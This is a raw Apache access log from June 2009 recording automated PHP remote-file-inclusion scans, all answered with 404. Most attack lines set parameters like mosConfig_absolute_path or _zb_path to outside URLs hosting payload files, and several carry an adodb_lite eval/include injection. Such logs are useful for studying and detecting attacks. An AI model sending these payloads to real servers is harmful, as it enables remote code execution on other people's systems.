211.43.195.120 - - [27/Jun/2009:08:53:00 -0500] "GET /logs/access_log.1238803200///admin.php?include_path=http://aldea.golfmol.com//_private/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.136.20.14 - - [27/Jun/2009:08:53:01 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.229.45.106 - - [27/Jun/2009:08:53:24 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.d-sport.ru//assets/cache/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.229.45.106 - - [27/Jun/2009:08:53:24 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.d-sport.ru//assets/cache/fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.229.45.106 - - [27/Jun/2009:08:53:24 -0500] "GET /logs/access_log.1240012800//bbs//skin/zero_vote/ask_password.php?dir=http://www.d-sport.ru//assets/cache/fx29id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.229.45.106 - - [27/Jun/2009:08:53:44 -0500] "GET /logs/access_log.1239062400//bbs//skin/zero_vote/ask_password.php?dir=http://www.d-sport.ru//assets/cache/fx29id.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
12.158.191.112 - - [27/Jun/2009:09:04:01 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.c21vox.tv/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
12.158.191.112 - - [27/Jun/2009:09:04:01 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.c21vox.tv/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
12.158.191.112 - - [27/Jun/2009:09:04:01 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://www.c21vox.tv/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
12.158.191.112 - - [27/Jun/2009:09:04:02 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://www.c21vox.tv/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.106.148 - - [27/Jun/2009:09:10:14 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [27/Jun/2009:09:13:03 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:03 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:03 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:04 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:32 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:32 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:32 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:09:13:33 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:06 -0500] "GET /logs/access_log.1240358400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:06 -0500] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:06 -0500] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:08 -0500] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:08 -0500] "GET /logs/access_log.1240358400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:08 -0500] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:10 -0500] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:10 -0500] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:16:10 -0500] "GET /logs/access_log.1240358400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:17:02 -0500] "GET /logs/access_log.1239926400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:17:06 -0500] "GET /logs/access_log.1239926400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:09:17:07 -0500] "GET /logs/access_log.1239926400//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:20:54 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:20:54 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:20:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.55.106.148 - - [27/Jun/2009:09:20:55 -0500] "GET /logs/access_log.1113091200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.85.77.74 - - [27/Jun/2009:09:21:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:21:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:21:28 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:23:21 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:25:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:25:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:25:14 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:25:54 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:25:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:25:54 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:09:27:00 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:09:27:00 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:09:27:00 -0500] "GET /logs/access_log.1240358400//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.150.78.245 - - [27/Jun/2009:09:27:18 -0500] "GET /logs/access_log.1239926400//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:27:49 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:29:04 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:29:04 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:29:05 -0500] "GET //include/bbs.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:29:26 -0500] "GET /logs/access_log.1235952000//include/bbs.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.140.23.192 - - [27/Jun/2009:09:30:58 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:09:30:58 -0500] "GET //bbs/outlogin.php?_zb_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
65.55.106.109 - - [27/Jun/2009:09:31:25 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
60.43.229.5 - - [27/Jun/2009:09:32:40 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 337 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:09:32:40 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 342 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:09:32:40 -0500] "GET /logs/access_log.1235952000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 364 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:09:32:42 -0500] "GET /logs/access_log.1238284800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 364 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:09:33:21 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:09:33:21 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:09:33:21 -0500] "GET /logs/access_log.1230163200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:09:33:21 -0500] "GET /logs/access_log.1232496000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:09:33:29 -0500] "GET /logs/access_log.1230076800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:34:31 -0500] "GET /logs/access_log.1233705600//include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:34:31 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:34:31 -0500] "GET //include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:09:34:38 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:09:34:38 -0500] "GET //include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:09:34:38 -0500] "GET /logs/access_log.1233705600//include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.30.100.97 - - [27/Jun/2009:09:34:44 -0500] "GET /logs/access_log.1235952000//include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:34:52 -0500] "GET /logs/access_log.1235952000//include/admin.lib.inc.php?site_path=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:38:29 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:38:29 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:38:29 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.85.77.74 - - [27/Jun/2009:09:39:44 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.23.192 - - [27/Jun/2009:09:40:45 -0500] "GET /logs//outlogin.php?_zb_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:09:40:45 -0500] "GET //outlogin.php?_zb_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
200.107.138.34 - - [27/Jun/2009:09:45:55 -0500] "GET /logs/access_log.1241654400/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:45:55 -0500] "GET /common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:46:00 -0500] "GET /logs/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:46:03 -0500] "GET /logs/access_log.1239580800/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:46:36 -0500] "GET /logs/access_log.1228694400//errors.php?error/=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:09:46:37 -0500] "GET //errors.php?error/=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:09:46:37 -0500] "GET /logs//errors.php?error/=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.107.138.34 - - [27/Jun/2009:09:46:38 -0500] "GET /common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:46:38 -0500] "GET /logs/access_log.1241654400/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:09:46:39 -0500] "GET /logs/access_log.1228694400//errors.php?error/=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:09:46:41 -0500] "GET //errors.php?error/=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
125.131.116.12 - - [27/Jun/2009:09:46:41 -0500] "GET /logs//errors.php?error/=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.107.138.34 - - [27/Jun/2009:09:46:41 -0500] "GET /logs/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:46:41 -0500] "GET /logs/access_log.1239580800/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:09:46:56 -0500] "GET /errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.208.137 - - [27/Jun/2009:09:47:19 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [27/Jun/2009:09:47:20 -0500] "GET /logs/access_log.1124928000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.188.129.126 - - [27/Jun/2009:09:47:31 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:09:47:31 -0500] "GET /logs/errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:09:47:31 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:48:02 -0500] "GET /logs/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:48:02 -0500] "GET /common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:48:02 -0500] "GET /logs/access_log.1241654400/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:48:48 -0500] "GET /logs/access_log.1239580800/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:51:05 -0500] "GET /logs/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:51:05 -0500] "GET /common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:51:05 -0500] "GET /logs/access_log.1241654400/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:51:59 -0500] "GET /logs/access_log.1239580800/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:09:57:21 -0500] "GET //guestbook1//admin.php?include_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:09:57:21 -0500] "GET /logs//guestbook1//admin.php?include_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.826"
82.136.20.14 - - [27/Jun/2009:09:58:29 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:09:58:29 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
200.107.138.34 - - [27/Jun/2009:09:59:12 -0500] "GET /logs/access_log.1241654400/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:59:12 -0500] "GET /logs/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:59:12 -0500] "GET /logs/access_log.1239580800/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:09:59:12 -0500] "GET /common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
82.136.20.14 - - [27/Jun/2009:10:00:03 -0500] "GET /logs//guestbook1//admin.php?include_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
82.136.20.14 - - [27/Jun/2009:10:00:03 -0500] "GET //guestbook1//admin.php?include_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
65.55.106.110 - - [27/Jun/2009:10:01:25 -0500] "GET /logs/access_log.1107993600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.107.138.34 - - [27/Jun/2009:10:03:12 -0500] "GET /common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:03:12 -0500] "GET /logs/access_log.1241654400/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:03:12 -0500] "GET /logs/access_log.1239580800/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:10:03:12 -0500] "GET /logs/common/db.php?commonpath=http://styrovit.ru/includes/idxx.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
66.172.22.2 - - [27/Jun/2009:10:08:28 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:10:08:28 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:10:08:43 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
66.172.22.2 - - [27/Jun/2009:10:08:44 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://hotels.ivycanada.ca/bbs/lang/id.txt????? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
220.181.7.97 - - [27/Jun/2009:10:09:24 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.75.60.116 - - [27/Jun/2009:10:09:58 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 368 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:10:09:58 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
